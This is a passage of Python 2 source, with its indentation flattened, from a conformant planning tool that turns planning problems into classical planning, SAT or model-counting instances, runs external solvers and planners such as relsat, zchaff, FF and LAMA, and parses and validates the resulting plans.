sat=True
for l in relsat.stdout.readlines():
if(l.startswith('Solution')):
# From HERE
lines = ''
nlines = 0
models = set((l.split(':')[1].strip()).split(' '))
for a in range(1,n_atoms_init+1):
if(str(a) in models):
lines += ' '+str(a)+' 0\n'
else:
lines += ' -'+str(a)+' 0\n'
nlines += 1
# to HERE, better to use relsat2model
cnf_f = open(cnf_nf,'r')
line = cnf_f.readline().split(' ')
cnfs0_f=open(cnfs0_nf,'w')
cnfs0_f.write("p cnf %s %d\n" % (line[2], nlines+int(line[3])) )
cnfs0_f.write(lines)
for line in cnf_f.readlines():
cnfs0_f.write(line)
cnf_f.close()
cnfs0_f.close()
cmd2=[Loc+'/relsat',cnfs0_nf]
relsat2=subprocess.Popen(cmd2,bufsize=-1, stdout=subprocess.PIPE)
tokill.append(relsat2.pid)
for l in relsat2.stdout.readlines():
if(l.find('UNSAT') >= 0):
sat = False
break
res = relsat2.wait()
tokill.pop()
if(res < 0):
pr('Error calling relsat (2): %d' % res)
sys.exit(1)
if(not sat): break
if(not sat):
try:
os.kill(relsat.pid,15)
except OSError, e:
if e.errno == errno.ESRCH:
pass
else:
raise
relsat.wait() < 0
tokill.pop()
return sat
def global_time():
return resource.getrusage(resource.RUSAGE_SELF)[0]+\
resource.getrusage(resource.RUSAGE_CHILDREN)[0]
def lost_wall_clock():
return time.time() - init_wall_clock -\
global_time()
final_time = -1
global_total_time = 0
def finish():
if(statline != ''):
stat_f.write(statline+'\n')
if( final_time == -1 ):
rt = global_time()
else:
rt = final_time
if global_total_time == 0:
t = str(rt)
else:
t = str(global_total_time)
line = 'TOTAL_TIME:' + t
pr(line)
stat_f.write(line+'\n')
time_f = open(time_nf,'w')
time_f.write(t)
cleanfiles()
def cleanfiles():
for f in erase:
weak_unlink(f)
if(not do_debug):
for f in erasedebug:
weak_unlink(f)
def save_plan(plan,extra=''):
ipc5_f=open(ipc5_nf+extra,'w')
ipc5_f.write('0\n')
ipc5_f.write('%%\n')
ipc5_f.write(str(len(plan)))
for act in plan:
ipc5_f.write(' '+act)
ipc5_f.write('\n')
ipc5_f.write('%%\n')
ipc5_f.write('linear ')
ipc5_f.write(str(len(plan)))
for i in range(0,len(plan)):
ipc5_f.write(' '+str(i))
ipc5_f.write('\n')
ipc5_f.close()
def save_flat_plan(plan,nf):
f=open(nf,'w')
for act in plan:
f.write(act+'\n')
f.close()
go_on=False
def going_on(signum, frame):
global go_on
go_on=True
print 'Continuing.... because got signal',signum
signal.signal(signal.SIGUSR1, going_on)
go_on_others = False
def donothing(signum, frame):
#print 'Child finish',frame.f_code
global go_on_others
go_on_others = True
pass
# Current distribution de of Lama requieres PDDL to be in
# the same directory where their executables are.
# Set in an enviroment var LAMA
def run_classical_lama(Loc,ndomain_nf,nproblem_nf,is_nondet,to_run_classical):
copy_to_path = False
try:
lama_dir=os.environ['LAMA']
except KeyError, e:
pr('LAMA var enviroment not set. Where is it?')
to_run_classical = False
return
if copy_to_path:
shutil.copy(ndomain_nf,lama_dir)
shutil.copy(nproblem_nf,lama_dir)
cur_dir = os.environ['PWD']
if copy_to_path:
os.chdir(lama_dir)
try:
os.remove('res.1')
except OSError:
pass
if copy_to_path:
cmd=['./plan',ndomain_nf,nproblem_nf,'res']
else:
cmd=[lama_dir+'/plan',ndomain_nf,nproblem_nf,'res']
pr(gen_log('Solving classical problem'))
log(gen_log('--------- Calling',cmd))
log_f.flush()
log_nf_tmp2=log_nf+'-lama.tmp'
erasedebug.add(log_nf_tmp2)
erasedebug.add('res.1')
erase.add('output')
erase.add('output.sas')
erase.add('test.groups')
log_f_tmp2=open(log_nf_tmp2,'w')
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
go_on_others = False
classical=subprocess.Popen(cmd, bufsize=-1, stdout=log_f_tmp2, stderr=log_f_tmp2)
tokill.append(classical.pid)
res = classical.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if( res < 0):
pr('Error calling classical: %d' % res)
to_run_classical = False
log_f_tmp2.close()
log_f_tmp2 = open(log_nf_tmp2,'r')
for l in log_f_tmp2.readlines():
log_f.write(l)
if 'std::bad_alloc' in l or 'MemoryError' in l:
to_run_classical = False
pr('solving classical problem: NO MEMORY')
log_f_tmp2.close()
full_plan=[]
for l in file('res.1'):
full_plan.append(l.strip().replace(' )',')'))
if copy_to_path:
shutil.move(log_nf_tmp2,cur_dir)
os.chdir(cur_dir)
return [full_plan,to_run_classical,elapsed]
def run_classical_ff(Loc,ndomain_nf,nproblem_nf,is_nondet,to_run_classical):
path=os.environ['PWD']+'/'
cmd=[Loc+'/ff','-p',path,'-o',ndomain_nf,'-f',nproblem_nf]
if False and is_nondet:
cmd.extend(['-h','1'])
pr(gen_log('Solving classical problem'))
log(gen_log('--------- Calling',cmd))
log_f.flush()
log_nf_tmp2=log_nf+'-ff.tmp'
erasedebug.add(log_nf_tmp2)
log_f_tmp2=open(log_nf_tmp2,'w')
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
go_on_others = False
classical=subprocess.Popen(cmd, bufsize=-1, stdout=log_f_tmp2, stderr=log_f_tmp2)
tokill.append(classical.pid)
res = classical.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if( res < 0):
pr('Error calling classical: %d' % res)
to_run_classical = False
log_f_tmp2.close()
exp = re.compile('[0-9]:',re.VERBOSE)
log_f_tmp2 = open(log_nf_tmp2,'r')
full_plan=[]
for l in log_f_tmp2.readlines():
log_f.write(l)
if exp.search(l):
act = '(' + l.split(':')[1].split()[0].strip() + ')'
full_plan.append(act)
if l.startswith('NO MEMORY'):
to_run_classical = False
pr('solving classical problem: NO MEMORY')
log_f_tmp2.close()
return [full_plan,to_run_classical,elapsed]
def run_classical(Loc,ndomain_nf,nproblem_nf,is_nondet,to_run_classical):
global classical_planner
"""
Should return [plan,full_plan,to_run_classical,elapsed]
where:
- plan: list of conformant actions, original arguments with obj/constants
- full_plan: list of classical actions (without merge, etc)
- to_run_classical: true if another run or another planner should be run
"""
if classical_planner.lower() == 'ff':
[full_plan,to_run_classical,elapsed] = run_classical_ff(Loc,ndomain_nf,nproblem_nf,is_nondet,to_run_classical)
elif classical_planner.lower() == 'lama':
[full_plan,to_run_classical,elapsed] = run_classical_lama(Loc,ndomain_nf,nproblem_nf,is_nondet,to_run_classical)
else:
pr('ERROR: classical planner neither FF or LAMA: %s' % classical_planner)
plan=[]
for a in full_plan:
au = a.upper()
if au.find('MERGE') < 0 and \
au.find('MAKE_END_DISJ_GOAL') < 0 and\
au.find('REACH-GOAL') < 0 and \
'----RESET' not in au:
act = a.replace('_',' ')
if is_nondet:
act_splitted = re.split('COPY----[0-9]+-',act)
if len(act_splitted) <> 1:
act = act_splitted[1]
plan.append(act)
return [plan,full_plan,to_run_classical,elapsed]
def cf2cs(exec_f,transf_type):
global statline, plan_found, erasedebug, erase, extra_options, go_on, global_total_time
pr('Starting cf2cs (%s): translating from conformant planning to classical planning' %
(transf_type+'. extra: '+str(extra_options)))
# Transform non-deterministic probs into deterministics
prefix_det='conf'
is_nondet = nondet2conf.nondet2conf(domain_nf, problem_nf, prefix_det)
tdomain_nf = prefix_det+'-d.pddl'
tproblem_nf = prefix_det+'-p.pddl'
erasedebug.add(tdomain_nf)
erasedebug.add(tproblem_nf)
if not is_nondet:
weak_unlink(tdomain_nf)
weak_unlink(tproblem_nf)
tdomain_nf = domain_nf
tproblem_nf = problem_nf
calc_models_cnf_f = '.init.cnf'
calc_models_sols_f = calc_models_cnf_f + '.sols'
erasedebug.add(calc_models_cnf_f)
erasedebug.add(calc_models_sols_f)
erasedebug.add('.c_i.cls')
erasedebug.add('.c_i.cls.pi')
erasedebug.add('.clauses.cnf')
erasedebug.add('.clauses.cnf.nnf')
erasedebug.add('output-c2d.log')
erasedebug.add('output-models.log')
# From conformant into classical
cmd=[Loc+'/'+exec_f]
if transf_type != '':
for i in transf_type.split(' '):
cmd.extend([i])
cmd.extend(extra_options)
prefix='new'
nproblem_nf = prefix+'-p.pddl'
ndomain_nf = prefix+'-d.pddl'
erasedebug.add(nproblem_nf)
erasedebug.add(ndomain_nf)
weak_unlink(nproblem_nf)
weak_unlink(ndomain_nf)
cmd.append('-sp') # cf2cs let know this process that is has finished on generating PDDLs
cmd.extend(['-s',prefix,tdomain_nf,tproblem_nf])
pr(gen_log('Generating PDDL for classical problem'))
log(gen_log('--------- Calling',cmd))
log_f.flush()
log_nf_tmp=log_nf+'-cf2cs.tmp'
erasedebug.add(log_nf_tmp)
log_f_tmp=open(log_nf_tmp,'w')
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
cf2cs=subprocess.Popen(cmd, bufsize=-1, stdout=log_f_tmp, stderr=log_f_tmp)
tokill.append(cf2cs.pid)
# Iterar hasta que
# Cuando encuentra plan, mandar signal a cf2cs.pid para que termine clean
# cuando no se encuentra, mandar otro signal para que vuelva a generar pddl
to_run_classical = True
print "I'm",os.getpid(),'and cf2cs is',cf2cs.pid
while to_run_classical:
# Are the files there?
signal.signal(signal.SIGCHLD, donothing)
[gotpid,code] = os.waitpid(0,os.WNOHANG)
if gotpid == 0:
if not go_on:
print 'Pausing (waiting for new PDDL).'
if not go_on:
signal.pause()
else:
print 'Seems that process',gotpid,'already finished. Code:',code
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
#print 'Awake. Looking for files and running planner'
if not os.access(os.path.abspath(ndomain_nf),os.F_OK) or\
not os.access(os.path.abspath(nproblem_nf),os.F_OK):
pr('generation of new pddls, FAILED')
return
# Run classical planner
[plan,full_plan,to_run_classical,elapsed] = \
run_classical(Loc,ndomain_nf,nproblem_nf,is_nondet,to_run_classical)
if(plan == []):
pr('solving classical problem: FAILED')
stat_f.write('classical_planner_failed\n')
[gotpid,code] = os.waitpid(0,os.WNOHANG)
if gotpid == 0:
# Trying with others pddls
weak_unlink(nproblem_nf)
weak_unlink(ndomain_nf)
if to_run_classical:
go_on=False
pr('Generating a new PDDL')
os.kill(cf2cs.pid,signal.SIGUSR1)
else:
try:
os.kill(cf2cs.pid,signal.SIGUSR2)
except OSError:
pass
else:
pr('cf2cs finished. No plan found')
stat_f.write('cf2cs_finished\n')
to_run_classical = False
continue
pr(gen_log('solution FOUND'))
global_total_time += elapsed
stat_f.write('solving_time:'+str(elapsed)+'\n')
try:
os.kill(cf2cs.pid,signal.SIGUSR2)
except OSError:
pass
plan_found=True
to_run_classical = False
pr('Plan: ')
for act in plan:
pr(act)
msg = 'PLAN_LENGTH:' + str(len(plan)) +'\n'
pr(msg)
stat_f.write(msg)
pr('')
save_plan(plan)
if check_plan :
try:
# Check also classical plan
flat_plan_nf = prefix+'.plan'
erasedebug.add(flat_plan_nf)
save_flat_plan(full_plan,flat_plan_nf)
cmd=[Loc+'/validate','-v',ndomain_nf,nproblem_nf,flat_plan_nf]
log(gen_log('--------- Calling',cmd))
validate=subprocess.Popen(cmd, bufsize=-1, stdout=subprocess.PIPE, stderr=log_f )
tokill.append(validate.pid)
isvalid = False
unknown_warning = False
output = ''
for l in validate.stdout.readlines():
output += l
if l.startswith('Plan valid'):
isvalid = True
elif 'WARNING' in l:
if 'adds the literal' not in l and 'deletes the literal' not in l:
unknown_warning = True
if unknown_warning:
isvalid = False
if not isvalid:
pr(output)
else:
pr('Valid classical plan')
statline += '\nCLASSICAL-OK:'
if(isvalid):
statline += 'YES'
else:
statline += 'NO'
res = validate.wait()
tokill.pop()
if(res < 0):
pr('Error calling validate: %d' % res)
except OSError, e:
pr('failing on call verifier...')
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
try:
res = cf2cs.wait()
except OSError:
res = cf2cs.returncode
if res == None: res = 0
if( res < 0 ):
pr('Error calling cf2cs: %d' % int(res) )
sys.exit(1)
if True or not plan_found:
log_f_tmp.close()
pi_time=0
for i in open(log_nf_tmp,'r'):
log_f.write(i)
if(i.find('FATAL ERROR') >= 0):
stat_f.write('translation_failure')
plan_found = False
sys.exit(1)
if(i.startswith('STAT')):
s,var,value = i.split(' ')
stat_f.write(var+' '+value)
if(' Time elapsed in Prime implicates' in i):
pi_time=get_user_time(i.split(':')[1].strip())
if(i.startswith('REGISTER: main()')):
elapsed = float(i.split()[3])
elapsed = elapsed+pi_time
global_total_time += elapsed
stat_f.write('translation_time:'+str(elapsed)+'\n')
def relsat2model(l,n_atoms_init):
"""
l is a relsat all solutions line (with -#a option). For example:
Solution 5: 45 123 2 1 12
"""
models = set((l.split(':')[1].strip()).split())
model=[]
for a in range(1,n_atoms_init+1):
if(str(a) in models):
model.append(int(a))
else:
model.append(-int(a))
#print 'MODEL',n_atoms_init,model
return model
def make_bits(num,num_bits,base):
"""
Return the binary encoding of num
using num_bits bits.
Each bit is representing using a numeric variable (cnf sense)
starting from base+1
"""
l=[]
for b in range(0,num_bits):
#print 2**b, base, base+b+1
if num & (2**b) == 0:
l.append(str(-(base+b+1)))
else:
l.append(str(base+b+1))
l.reverse()
return l
# Print all the possible initial states
def do_enum_s0(n_atoms_init,atoms_nf,init_nf,printit=True):
atom2fluent = calc_atom2fluent(atoms_nf)
cmd=[Loc+'/relsat','-#a',init_nf]
relsat=subprocess.Popen(cmd,bufsize=1000, stdout=subprocess.PIPE)
tokill.append(relsat.pid)
if printit:
print 'Models:'
else:
result=[]
for l in relsat.stdout.readlines():
if(l.startswith('Solution ')):
if printit:
print 'Solution: ',
for i in l.split(': ')[1].split():
atom = atom2fluent[i]
print str(atom),
print ''
else:
result.append(relsat2model(l,n_atoms_init))
res = relsat.wait()
tokill.pop()
if(res < 0):
pr('Error calling relsat -#c: %d ' % res)
sys.exit(1)
if not printit:
return result
def try_relsat(cnf2_nf, actions_nf, num=1):
global statline, erase, erasedebug
#raise Exception('relsat', 'file')
if(not os.access(Loc+'/relsat',os.F_OK)):
print "relsat executable doesn't exist"
raise Exception('relsat', 'file')
if num>1:
cmd4=[Loc+'/relsat','-#a',cnf2_nf]
else:
cmd4=[Loc+'/relsat',cnf2_nf]
actions_f=open(actions_nf,'r')
actions=set(actions_f.read().split(' ')[1:-1])
actions_f.close()
pr(gen_log('Calling SAT solver'))
log(gen_log('--------- Calling', cmd4))
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
relsat=subprocess.Popen(cmd4,bufsize=1000, stdout=subprocess.PIPE)
tokill.append(relsat.pid)
all_plan_atoms = []
for l in relsat.stdout:
plan_atoms = []
if(l.startswith('UNSAT')):
return False,[]
elif(l.startswith('Solution ')):
for i in l.split(': ')[1].split():
if(i in actions):
plan_atoms.append(i)
num -= 1
all_plan_atoms.append(plan_atoms)
if num == 0:
break
os.kill(relsat.pid,15)
res = relsat.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
# if(res < 0):
# pr('Error calling relsat -#c: %d ' % res)
# sys.exit(1)
statline += str(elapsed)
return True,all_plan_atoms
def try_siege(cnf2_nf, actions_nf):
global statline, erase, erasedebug
#raise Exception('siege', 'file')
if(not os.access(Loc+'/siege_v4',os.F_OK)):
print "siege_v4 executable doesn't exist"
raise Exception('siege', 'file')
cmd4=[Loc+'/siege_v4',cnf2_nf]
pr(gen_log('Calling SAT solver'))
log(gen_log('--------- Calling', cmd4))
results_nf='siege.results'
erasedebug.add(results_nf)
weak_unlink(results_nf)
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
siege=subprocess.Popen(cmd4, bufsize=-1, stdout=log_f, stderr=log_f )
tokill.append(siege.pid)
res = siege.wait() < 0
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if(res < 0):
pr('Error calling sieve_v4: %d' % res)
raise Exception('siege', 'process')
statline += str(elapsed)
if(not os.access(os.path.abspath(results_nf),os.F_OK)):
print 'siege_v4 did not obtain results'
raise Exception('siege', 'file')
results_f=open(results_nf,'r')
result=results_f.readline()
actions_f=open(actions_nf,'r')
actions=set(actions_f.read().split(' ')[1:-1])
actions_f.close()
sat=True
plan_atoms=[]
for w in result.split(' '):
if(w.startswith('unsat')):
sat=False
break
if(w in actions):
plan_atoms.append(w)
return sat, plan_atoms
def try_zchaff(cnf2_nf, actions_nf):
global statline, erase, erasedebug
cmd4=[Loc+'/zchaff',cnf2_nf]
pr(gen_log('Calling SAT solver'))
log(gen_log('--------- Calling', cmd4))
results_nf='zchaff.out'
erasedebug.add(results_nf)
weak_unlink(results_nf)
results_f=open(results_nf, 'w')
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
zchaff=subprocess.Popen(cmd4, bufsize=-1, stdout=results_f, stderr=results_f )
tokill.append(zchaff.pid)
res = zchaff.wait() < 0
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if(res < 0):
pr('Error calling zchaff: %d' % res)
sys.exit(1)
statline += str(elapsed)
results_f=open(results_nf,'r')
actions_f=open(actions_nf,'r')
actions=set(actions_f.read().split(' ')[1:-1])
actions_f.close()
sat='bad'
plan_atoms=[]
for l in results_f.readlines():
log(l[0:-1])
line = l.split(' ')
if line[0].isdigit():
sat=True
for w in line:
if(w == 'Random'):
break
if(w in actions):
plan_atoms.append(w)
elif line[0].startswith('RESULT:'):
res = line[0].split('\t')
if(res[1].startswith('SAT')):
sat = True
elif (res[1].startswith('UNSAT')):
sat = False
else:
pr('Error processing zchaff output')
sys.exit(1)
if sat == 'bad':
pr('Error processing zchaff output, ac')
sys.exit(1)
return sat, plan_atoms
def cf2sat(nnf_nf, n_atoms_init, cnf2_nf, actions_nf ):
global statline
cmd3=[Loc+'/2sat',nnf_nf,str(n_atoms_init)]
pr(gen_log('Generating new CNF'))
log(gen_log('--------- Calling',cmd3))
tosat=subprocess.Popen(cmd3, bufsize=-1, stdout=log_f, stderr=log_f )
tokill.append(tosat.pid)
res=tosat.wait();
tokill.pop()
if(res < 0):
pr('Error calling 2sat %d: ' % res)
sys.exit(1)
cnf2_f = open(cnf2_nf,'r')
line = cnf2_f.readline().split(' ')
nvars = line[2]
nclauses = line[3][0:-1]
statline += nvars + ';' + nclauses + ';'
cnf2_f.close()
try:
sat, plan_atoms = try_siege(cnf2_nf, actions_nf)
except Exception, inst:
if inst.args == ('siege', 'file'):
pr('siege_v4 failed. Trying with zchaff')
sat, plan_atoms = try_zchaff(cnf2_nf, actions_nf)
else:
raise
return sat, plan_atoms
#' nvars2 nclauses2 sat-time\n'
#' nnodes nedgest backtracks nodes searchtime\n'
def read_output_plannf(results_nf):
global statline, isprob
found = 'bad'
backtracks = 'bad'
nodes = 'bad'
time = 'bad'
prob = -1
plan_atoms = []
results_f=open(results_nf,'r')
reading_act = False
for l in results_f.readlines():
log(l[0:-1])
line = l.split(':')
if reading_act:
if line[0] == 'action':
plan_atoms.append(line[1].strip())
else:
reading_act = False
else:
if l.startswith('PLAN RESULT:'):
if line[1].strip() == 'FOUND':
found = True
elif line[1].strip() == 'NOT-FOUND':
found = False
elif l.startswith('NODES GENERATED:'):
nodes = line[1].strip()
elif l.startswith('BACKTRACKS:'):
backtracks = line[1].strip()
elif l.startswith('TIME ON SEARCHING:'):
time = line[1].strip()
elif l.startswith('un Plan:'):
reading_act = True
elif l.startswith('Found plan with probability'):
prob = float(l.split('=')[1].strip())
statline += backtracks + ';' + nodes + ';' + time
return found, prob, plan_atoms
def cf2mc(nnf_nf, n_atoms_init, num_s0s, actions2time_nf, vars2prob_nf ):
global statline, cleaning_functions, isprob
nnf_f = open(nnf_nf,'r')
line = nnf_f.readline().split()
nnodes = line[1]
nedges = line[2]
statline += nnodes + ';' + nedges + ';'
nnf_f.close()
cmd3=[Loc+'/plannf']
if not simple_prunning:
cmd3.append('-nsim')
if not strong_prunning:
cmd3.append('-nstr')
if most_likely_selection:
cmd3.append('-lik')
if isprob:
cmd3.extend(['-p',vars2prob_nf,actions2time_nf,nnf_nf])
pr(gen_log('Searching over probabilistic plan space using WMC over d-DNNF'))
else:
cmd3.extend(['-z',str(n_atoms_init),str(num_s0s),actions2time_nf,nnf_nf])
pr(gen_log('Searching over plan space using MC over d-DNNF'))
log(gen_log('--------- Calling',cmd3))
results_nf='plannf.out'
erasedebug.add(results_nf)
weak_unlink(results_nf)
results_f=open(results_nf, 'w')
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
plannf=subprocess.Popen(cmd3, bufsize=-1, stdout=results_f, stderr=results_f )
tokill.append(plannf.pid)
cleaning_functions.append([read_output_plannf,results_nf])
res = plannf.wait()
cleaning_functions.pop()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if(res < 0):
pr('Error calling plannf: %d' % res)
sys.exit(1)
results_f.close()
found, prob, plan_atoms = read_output_plannf(results_nf)
#statline += str(elapsed)
if isprob:
pr('Probability: %f' % prob)
statline += '\nPROBABILITY:' + str(prob)
return True, plan_atoms
else:
return found, plan_atoms
def is_prob( isprob_nf ):
isprob_f = open(isprob_nf,'r')
line = isprob_f.readline()
isprob_f.close()
return line.startswith('yes')
# OJO: Faltan auxvars
class Atoms:
def atoms_add(self,listmap,time,var,value):
while time >= len(listmap):
listmap.append({})
listmap[time][var] = value
def atoms_add_action(self,time,var,lit):
self.atoms_add(self.action2str,time,var,lit)
self.atoms_add(self.str2action,time,lit,var)
def atoms_add_fluent(self,time,var,lit):
self.atoms_add(self.fluent2str,time,var,lit)
self.atoms_add(self.str2fluent,time,lit,var)
def atoms_add_effect(self,time,var,val):
self.atoms_add(self.effect2stract,time,var,val)
self.atoms_add(self.stract2effect,time,val,var)
def __init__(self,atoms_nf,auxvars_nf):
self.fluent2str = []
self.str2fluent = []
self.action2str = []
self.str2action = []
self.extravars = []
self.effect2stract = []
self.stract2effect = []
self.conditions = set()
self.last_time = -1
atoms_f = open(atoms_nf,'r')
for l in atoms_f:
line = l.split(' ',2)
var = int(line[0][1:])
svalue = line[2].split('*')
if len(svalue) > 1:
has_star = True
else:
has_star = False
value = svalue[0].strip()
if value.find(':') > 0:
var_time = value.split(':')
time = int(var_time[0])
self.last_time = max(time,self.last_time)
lit = var_time[1].lower()
if has_star:
self.atoms_add_action(time,var,lit)
else:
self.atoms_add_fluent(time,var,lit)
elif value.startswith('(extra-room') > 0:
self.extravars.append(var)
auxvars_f = open(auxvars_nf,'r')
for l in auxvars_f:
line = l.split(' ',4)
time = int(line[0])
auxvar = int(line[1])
act = int(line[3])
auxstr = frozenset(lug.condition2tuple(line[4].strip().lower()))
self.atoms_add_effect(time,auxvar,(act,auxstr))
for cond in auxstr:
self.conditions.add(cond)
#print 'TRANSLATOR:',self.effect2stract
def concatenate_cnf(cnf_nf, new_cnf,overwrite=True,recalculate_nvars=False):
global erasedebug
if overwrite:
# rename file
cnfold_nf = cnf_nf + '.old'
erasedebug.add(cnfold_nf)
shutil.move(cnf_nf,cnfold_nf)
# load header of cnf_nf
cnfold_f = open(cnfold_nf,'r')
cnf_f = open(cnf_nf,'w')
else:
# newfile file
cnfnew_nf = cnf_nf + '.new'
erasedebug.add(cnfnew_nf)
# load header of cnf_nf
cnfold_f = open(cnf_nf,'r')
cnf_f = open(cnfnew_nf,'w')
line = cnfold_f.readline().split(' ')
# calculate new number of clauses (same number of vars)
nvars = int(line[2])
nclauses = int(line[3][0:-1])
new_nvars = nvars
if recalculate_nvars:
for clause in new_cnf:
for lit in clause:
new_nvars = max(new_nvars,abs(lit))
cnf_f.write("p cnf %d %d\n" % (new_nvars, nclauses+len(new_cnf)))
# new cnf
for clause in new_cnf:
for lit in clause:
cnf_f.write(str(lit)+' ')
cnf_f.write('0 \n')
# old cnf
for line in cnfold_f.readlines():
cnf_f.write(line)
cnf_f.close()
def simplify_cnf(cnf_nf):
global erasedebug
# rename file
cnfold_nf = cnf_nf + '.pre-simplify'
cnfold_simple_nf = cnfold_nf + '_simplified'
erasedebug.add(cnfold_nf)
erasedebug.add(cnfold_simple_nf)
shutil.move(cnf_nf,cnfold_nf)
cmd2 = [Loc+'/c2d_220','-in',cnfold_nf,'-simplify']
pr(gen_log('Simplifying CNF'))
log(gen_log('--------- Calling',cmd2))
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
c2d=subprocess.Popen(cmd2, bufsize=-1, stdout=log_f, stderr=log_f )
tokill.append(c2d.pid)
res = c2d.wait();
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if(res < 0):
pr('Error calling c2d: %d' % res)
sys.exit(1)
shutil.move(cnfold_simple_nf,cnf_nf)
def make_qbf(k,n_atoms_init,problem_nf,cnf_nf,atoms_nf,init_nf,actions_nf):
qbf_nf = problem_nf+'-'+str(k)+'.qdimacs'
models=do_enum_s0(n_atoms_init,atoms_nf,init_nf,False)
num_s0 = len(models)
num_bits = int(math.log(num_s0-1)/math.log(2))+1
# Opening cnf
cnf_f = open(cnf_nf,'r')
line = cnf_f.readline().split(' ')
old_nvars = int(line[2])
old_nlines = int(line[3])
#for saving result
lines = []
# Quantifiers
# actions
l = ['e']
actions=set(file(actions_nf).readlines()[0].split()[1:])
l.extend(actions)
actions=set(actions)
l.append('0')
lines.append(l)
# bits
l = ['a']
for b in range(1,num_bits+1):
l.append(str(b+old_nvars))
l.append('0')
lines.append(l)
# rest
l = ['e']
for v in range(1,old_nvars+1):
if str(v) not in actions:
l.append(str(v))
l.append('0')
lines.append(l)
# Bits 2 state
counter = 0
new_lines = 0
for mod in models:
l = make_bits(counter,num_bits,old_nvars)
#print 'HLP',l, mod
for lit in mod:
lines.append(l[:])
lines[-1].extend([str(lit),'0'])
new_lines += 1
counter += 1
# Saving file2
qbf_f=open(qbf_nf,'w')
qbf_f.write("p cnf %s %d\n" % (num_bits+old_nvars, new_lines+old_nlines) )
for l in lines:
#print 'HLP', l
for a in l:
qbf_f.write(a+' ')
qbf_f.write('\n')
for line in cnf_f.readlines():
if '%' not in line:
qbf_f.write(line)
cnf_f.close()
qbf_f.close()
def cf2logic(method,dump_qbf=False):
global statline, plan_found, parallel, erasedebug, erase, isprob, use_lug, use_lug_last_layer
global init_horiz, end_horiz, extra_room
if method == 'cf2sat':
pr('Starting cf2sat: translating from conformant planning to SAT')
elif method == 'cf2mc':
pr('Starting cf2mc: translating from conformant planning to Compiling+Model Counting')
else:
pr('Error calling cf2logic: wrong method %s' % method)
sys.exit(1)
# Translating problem so, it doesn't use oneof
new_problem_nf=problem_nf+'2'
erasedebug.add(new_problem_nf)
os.system(Loc+'/oneof2clause.py '+problem_nf+' '+new_problem_nf)
#cf2sat files
base='full'
init_nf=base+'-init.cnf'
isprob_nf=base+'.isprob'
cnf_nf=base+'.cnf'
nnf_nf=cnf_nf+'.nnf'
partnnf_nf=nnf_nf+'.partcnf'
cnf2_nf=nnf_nf+'.cnf'
rfluents_nf=base+'.rfluents'
ifluents_nf=base+'.ifluents'
atoms_nf=base+'.atoms'
actions_nf=base+'.actions'
actions2time_nf=base+'.actions2time'
vars2prob_nf=base+'.vars2prob'
auxvars_nf=base+'.auxvars'
resolve='resolve_trace'
erase.add(partnnf_nf)
erase.add(resolve)
erasedebug.add(isprob_nf)
erasedebug.add(init_nf)
erasedebug.add(cnf_nf)
erasedebug.add(nnf_nf)
erasedebug.add(cnf2_nf)
erasedebug.add(rfluents_nf)
erasedebug.add(ifluents_nf)
erasedebug.add(atoms_nf)
erasedebug.add(actions_nf)
erasedebug.add(actions2time_nf)
erasedebug.add(vars2prob_nf)
erasedebug.add(auxvars_nf)
if use_lug:
lug_cnf_nf='cnf.out'
lug_dd_nf='dd.out'
lug_map_nf='mapping.out'
erasedebug.add(lug_cnf_nf)
erasedebug.add(lug_dd_nf)
erasedebug.add(lug_map_nf)
erasedebug.add(lug.debug_nf)
#$LUGDIR/lug2txt $domain $prob -cnf_out 0 0 -1 0 0 2&>lug2txt.out
cmd=[Loc+'/lug2txt',domain_nf,new_problem_nf]
if use_mutex:
cmd.append('-mutex')
if use_lug_persist:
cmd.append('-persist')
if not use_lug_props:
cmd.append('-no-props')
if not use_lug_effs:
cmd.append('-no-effs')
if not use_lug_acts:
cmd.append('-no-acts')
cmd.extend(['-cnf_out','0','0','-1','0','0'])
pr(gen_log('Generating LUG'))
log(gen_log('--------- Calling',cmd))
log_f.flush()
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
devnull = open('/dev/null','w')
lug2txt=subprocess.Popen(cmd, bufsize=-1, stdout=log_f, stderr=devnull )
tokill.append(lug2txt.pid)
res = lug2txt.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if( res < 0):
pr('Error calling lug2txt: %d' % res)
sys.exit(1)
stat_f.write('lug_time:'+str(elapsed)+'\n')
# LUG: Create structures for create CNF
use_lug_last_layer = use_lug_last_layer and use_lug_persist
mlug = lug.LUG( lug_map_nf, lug_cnf_nf, use_lug_last_layer )
level_off = mlug.get_level()
extra_room = mlug.get_n_extra()
if level_off > end_horiz:
pr('Level off of LUG: NO solution for horiz <',level_off)
sys.exit(1)
if level_off > init_horiz:
print 'Starting at',level_off,'because LUG level off'
init_horiz = level_off
consistent=False
rconsistent=False
thereisplan=False
n_atoms_init = -1
num_s0s = -1
new_cnf = []
for k in range(init_horiz,end_horiz+1):
if method == 'cf2sat' and statline == '' :
statline = 'horizon cconf-time nvars nclauses c2d-time nvars2 nclauses2 sat-time\n'
elif method == 'cf2mc' and statline == '' :
statline = 'horizon cconf-time nvars nclauses c2d-time nnodes nedges backtracks nodes searchtime\n'
else:
stat_f.write(statline+'\n')
statline = ''
statline += str(k) + ';'
pr('===== Horiz %d ===============' % k)
cmd=[Loc+'/cconf']
if(parallel):
cmd.extend(['-p'])
if extra_room > 0:
